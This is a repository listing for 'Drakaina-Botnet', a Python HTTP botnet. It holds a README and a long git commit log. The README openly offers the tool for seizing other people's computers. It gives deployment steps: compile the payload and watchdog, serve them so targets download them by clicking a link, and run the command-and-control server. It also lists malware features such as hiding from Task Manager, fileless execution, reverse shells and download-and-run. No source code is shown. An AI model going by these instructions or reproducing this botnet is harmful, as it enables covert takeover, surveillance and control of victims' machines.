======================: FILES :======================
======================: README CONTENT :======================
# Drakaina-Botnet
A HTTP botnet with the main core features with more to come, completely made in python.
Take control of anyone's computer like it's non of your buisness, because it is not.

# Instructions:

1) Make sure all files are in the same folder.

2) create a folder called static, and in that folder create a folder called windows.

3) compile payload.py, and watchdog.py with "Nuitka" using the command " python -m nuitka --onefile --disable-console script.py"

4) place both compiled files in the Windows folder you created ealiar, these files will be automatically downloaded to your target when they click the link.

5) open server.cfg and change the server and port to what you want the server to run on.

6) run server.py using " python server.py " or " python3 server.py " from the commandline.

7) test by downloading the Watchdog file from the link "http://<yourip>:<port>/downloads/windows/watchdog"

8) you should see requests comming in to your server...enjoy





# Watchdog:


+ Features:

+ Auto-start
+ Keeps payload alive.
+ Hide from Taskmanager.
+ Hide from startup.
+ Kill payload until Taskmanager is closed.
+ Run Payload in memory (no file touches disk).


# Payload:
+ Features:

+ Supports Multiple Commands
+ connects to reverse shell
+ downloads and runs binaries
+ Virtual-Machine Detection ( testing )
+ register to database



# C&C terminal:

/list = show registered users

/use = select a target

/create link = create a 1 time dynamic link to gather information ( incomplete ), link will stop working after it is clicked.

/help = show this.




# Server:

+ Features:

+ Checks if user is registered
+ Register users
+ Automatic download link's to binary files
+ downloads screenshots from payload
+ send mass command to all users
+ HTML GUI ( incomplete )



     

====================== GIT HISTORY: ======================
b0593db HEAD@{0}: clone: from https://github.com/h0lyl337/Drakaina-Botnet
commit b0593db9471a36ef1a0552347c8b02f7f01a485a
Merge: afc07d2 e090575
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Sat Oct 8 19:36:25 2022 -0400

    Merge pull request #1 from h0lyl337/dev
    
    Dev

commit e0905756d1086f645e6a7ed3e7d806c265252738
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri Oct 7 20:04:03 2022 -0400

    Update README.md

commit afc07d23cfd22147143e0e02869cb23e8c7c8e37
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri Oct 7 20:03:21 2022 -0400

    Update README.md

commit 71849908d488c0f257752b71e213d22e9a4f4074
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri Oct 7 19:55:21 2022 -0400

    Update README.md

commit 10d9f60ef4b3c45ec1a86f8bd9022dff2320bab2
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri Oct 7 19:54:38 2022 -0400

    Update apext_db.py

commit 5b3c4237bce76c66365eb1478b7ddb0d38c8deab
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri Oct 7 19:53:30 2022 -0400

    Rename server_config.cfg to server.cfg

commit 12c96950cb71e323b8261ddb6a20e3fcae06ae38
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri Oct 7 19:52:52 2022 -0400

    Update server.py

commit 6224611fe83171c3a95ed5c91e5202aa9b04082a
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri Oct 7 19:51:44 2022 -0400

    Update watchdog.py

commit eae82a84da81abe02aa2933ee7210470027ad1b2
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri Oct 7 19:48:28 2022 -0400

    Update commandcontrol.py

commit 36eb6e5fd53b06a89bcafab6ad6f8ecc51317a1a
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri Oct 7 09:12:59 2022 -0400

    Update README.md

commit 717e27ee3a68ca86deb0e9e2c95d6c5f1ae9f87a
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 04:56:02 2022 -0400

    Update README.md

commit 38cc19d617fcd559c10ebffbbb5e73e1e099604b
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 04:10:52 2022 -0400

    Update README.md

commit e5578fa85b8e9992de6bbb346f113e504d0ba04f
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 04:09:37 2022 -0400

    Add files via upload

commit 853bfb63b08dbd795d7d68a1554cf2c0ca51313a
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 04:09:03 2022 -0400

    Update server.py

commit 0fc89bf56221388e09af030883d48cfdf5d88c8a
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 03:30:44 2022 -0400

    Update README.md

commit e773195371921b2027da34058296562215120704
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 03:16:27 2022 -0400

    Update README.md

commit a9df27e9cde1efcbcd6394704d4cff477d6d1589
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 03:13:49 2022 -0400

    Update README.md

commit 56f40f488e772d96443c07b6e5dc0ee68a27ec97
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:55:59 2022 -0400

    Update README.md

commit 533911f09d8d12677aa50769a0395c5150ca7713
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:54:57 2022 -0400

    Update README.md

commit 81d2a356db07dc7380404fc5d1cf1250cce5b29b
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:54:18 2022 -0400

    Update README.md

commit e90b0079e6ce675b964d46f8a74a155fa7c2c066
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:53:38 2022 -0400

    Update README.md

commit 2f0cbe0a770447ee9e1b8e4d74d06f2d7eb6391d
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:52:09 2022 -0400

    Update README.md

commit 657b0aee3e940302c9bf68246c807b243955b56e
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:45:29 2022 -0400

    Update README.md

commit 7ce2dc96dddbe1130ae2d3ab179a8473fe6ad92b
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:43:26 2022 -0400

    Update README.md

commit 7b8e986def1f3a79bd479bb4772d1a07670fefa2
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:42:27 2022 -0400

    Update README.md

commit ae812837f800f080170a3daff603d29d23f47604
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:38:31 2022 -0400

    Update README.md

commit 9838c425b82dec24db251d4fd8e6d83df3bb8aa0
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:37:10 2022 -0400

    Update README.md

commit 596c9c50c44940a6b9cbdbcac8f2fc43f5a36167
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:36:55 2022 -0400

    Update README.md

commit 7e834e68741ddc2f5dcb9acd2adb0496727aabe7
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:36:37 2022 -0400

    Update README.md

commit 06802629cc56dc706050f0e27eed83802a070bd6
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:29:55 2022 -0400

    Update README.md

commit 49cd0d8855571f57d105c5e828f6283930461d13
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:25:39 2022 -0400

    Create README.md

commit fc3f35e687b839fea0c0aef5527f86384670dc40
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:23:10 2022 -0400

    Update README.md

commit 11e7bb78fd7ba0edfb40ef37aa07e6c0b5b736ed
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:22:51 2022 -0400

    Update README.md

commit db6cdd22a9da036a27302be87e4d32559df7f6ca
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:22:28 2022 -0400

    Update README.md

commit bae49864e260b617404eafed6340eb4b0026e551
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:13:04 2022 -0400

    Add files via upload

commit 2bfe5ed3b6710c66ed63e85fbc061b10fdc49b9b
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:11:25 2022 -0400

    Delete apext.db

commit bab774ec71d4b45f7e24842231a1be56102aef3f
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:10:10 2022 -0400

    Update apext_db.py

commit 7f8ef81db52a06976e3d013581253275b2f46bc4
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:09:50 2022 -0400

    Update commandcontrol.py

commit 19022d532f050c05e887767d981f070775979b1b
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:09:27 2022 -0400

    Delete privilege-escalation.py

commit ee1caf614300ef556458893043de0106d55bccb0
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:09:13 2022 -0400

    Update payload.py

commit 330a7eaba6e0df1a042c09a5c4a7c64428599e95
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:08:51 2022 -0400

    Update watchdog.py

commit 531025e8eaf4c920ab2b4311fe2939488fe1b507
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed Oct 5 02:08:27 2022 -0400

    Update server.py

commit 0b145fa7908679e2a3b3a45efefba5a0fca39fce
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Fri May 20 07:26:48 2022 -0400

    Add files via upload

commit cbd4c22e161f7791e76274d7942d6a506109c819
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 06:00:13 2022 -0400

    Update README.md

commit 0d8d3ae2a868a527f4a4cc06ca67190c0ea67808
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 05:58:50 2022 -0400

    Update watchdog.py

commit d43e5cdbbdb8f9603cd5241bff2a793e569d4231
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 05:57:16 2022 -0400

    Update README.md

commit 2a81d969c58a9a6c2e6f46db987bef15aa151aa9
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 05:52:50 2022 -0400

    Update README.md

commit f4b10b8a19bd019086e7029603e9c83b177c8337
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 05:52:09 2022 -0400

    Update README.md

commit 97dbaac38bbbc8867389c9812e665071b2564992
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 05:51:52 2022 -0400

    Update README.md

commit 56c0525319f9b51c4f30b858e32205717009efb3
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 05:37:54 2022 -0400

    Update README.md

commit a533ad2bc35d58c7c7a5fdba5ad0422f2f7d8a95
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 05:37:11 2022 -0400

    Update README.md

commit 020b50c4efb514e1e469694e5cf2e5548243e348
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 05:36:16 2022 -0400

    Update README.md

commit 8e79f4b1bc8a5c1d407f0a9f90628b732e57a8ee
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Thu May 19 05:35:57 2022 -0400

    Update watchdog.py

commit f189c143f68fa01fbdb13e026e06ba41fabb4d32
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed May 18 12:47:13 2022 -0400

    Update README.md

commit 29ed24acfe225532d14f021202772e22d9e239f5
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed May 18 12:46:50 2022 -0400

    Update README.md

commit c0041c2658924b94acb3a81aac0fae9852dccd61
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed May 18 12:44:49 2022 -0400

    Create README.md

commit 99a5174e2a65eb5683eaaeed3974b05b69989c8f
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed May 18 12:43:00 2022 -0400

    Add files via upload

commit 72e3ce80bbea04fb43ea9f4f79c1ddd9fee566a1
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Wed May 18 12:42:30 2022 -0400

    Add files via upload
